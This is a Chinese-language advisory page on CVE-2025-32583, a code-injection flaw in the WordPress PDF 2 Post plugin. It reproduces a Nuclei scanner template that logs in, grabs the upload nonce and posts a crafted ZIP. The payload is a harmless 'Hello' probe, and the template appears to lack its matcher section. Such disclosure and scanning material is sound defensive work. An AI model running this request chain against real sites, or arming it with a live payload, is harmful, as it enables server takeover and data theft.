WordPress PDF 2 Post Remote Code Execution Vulnerability

漏洞信息

漏洞名称: WordPress PDF 2 Post Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-32583

漏洞类型: 代码注入

漏洞等级: 高危

漏洞描述: WordPress PDF 2 Post插件是一个允许用户将PDF文件转换为WordPress文章的工具,广泛应用于需要内容迁移或批量发布的场景中。该插件在2.4.0及之前版本中存在一个代码注入漏洞,允许经过身份验证的攻击者执行远程代码。漏洞的根源在于插件对用户上传的文件处理不当,未能正确验证和过滤输入,导致攻击者可以通过构造恶意的ZIP文件注入任意代码。这一漏洞的高危性在于,攻击者可以利用此漏洞在服务器上执行任意命令,可能导致网站被完全控制、数据泄露或其他恶意操作。由于攻击需要身份验证,因此只有拥有有效用户凭证的攻击者才能利用此漏洞。然而,考虑到WordPress的广泛使用和PDF 2 Post插件的功能,这一漏洞对使用该插件的网站构成了严重威胁。

产品厂商: termel

产品名称: PDF 2 Post

影响版本: version <= 2.4.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/6e7a222b22023979c9f3dd9d77115cb4d11e75d6/http%2Fcves%2F2025%2F2025-32583.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

id: 2025-32583

info:
  name: WordPress PDF 2 Post RCE Exploit <= 2.4.0 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in termel PDF 2 Post allows Remote Code Inclusion. This issue affects PDF 2 Post: from n/a through 2.4.0.
  reference:
    - https://github.com/Nxploited/CVE-2025-32583
  tags: cve,cve2025,wordpress,wp-plugin,rce,plugin,pdf2rce

variables:
  filename: {{base64(gzip("Hello"))}}

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/edit.php?page=new-post-from-pdf HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Length: 711
        Content-Type: multipart/form-data; boundary=57fbacb93533400815c1e2ec994fe293

        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="pdf2post_upload_nonce"

        {{pdf2post_upload_nonce}}
        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="_wp_http_referer"
        /wp-admin/edit.php?page=new-post-from-pdf
        --57fbacb93533400815c1e2ec994fe293
        Content-Disposition: form-data; name="pdf_file_to_upload"; filename="{{randstr}}.zip"
        Content-Type: application/zip
        {{filename}}
        --57fbacb93533400815c1e2ec994fe293--



    extractors:
      - type: regex
        internal: true
        group: 1
        name: pdf2post_upload_nonce
        part: body_2
        regex:
          - 'name="pdf2post_upload_nonce" value="([a-f0-9]+)"'


Github Poc
#projectdiscovery/nuclei-templates:github issues #代码注入
WordPress PDF 2 Post Remote Code Execution Vulnerability
http://example.com/2025/07/17/github_3379160907/
作者
lianccc
发布于
2025年7月17日
许可协议